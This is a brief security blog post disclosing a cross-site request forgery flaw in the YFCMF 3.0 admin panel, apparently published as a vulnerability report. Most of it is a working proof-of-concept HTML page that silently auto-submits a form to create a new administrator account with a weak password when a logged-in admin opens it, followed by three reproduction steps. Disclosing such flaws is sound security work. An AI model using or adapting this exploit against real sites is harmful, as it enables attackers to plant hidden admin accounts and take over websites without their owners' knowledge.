Hpdoger's Blog.

Csrf in YFCMF 3.0

Word count: 99 / Reading time: 1 min
2018/08/23 Share

Explain

The background administrator adds CSRF to the page, causing other administrator accounts to add.

Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<html>
<form action="/YFCMF/admin/admin/adminsave.html" method="post">
<select name="group_id" required="">
<option value="2"/>
</select>
<input name="username" value="csrf" type="hidden"/>
<input name="password" value="123" type="hidden"/>
<input name="email" value="csrf@1.com" type="hidden"/>
<input name="realname" value="csrf" type="hidden"/>
</form>
<script>
document.forms[0].submit();
</script>
</html>

Reappearance

1、View original users

2、Accessing structured CSRF pages

3、Successfully added

CATALOG
  1. 1. Explain
  2. 2. Poc
  3. 3. Reappearance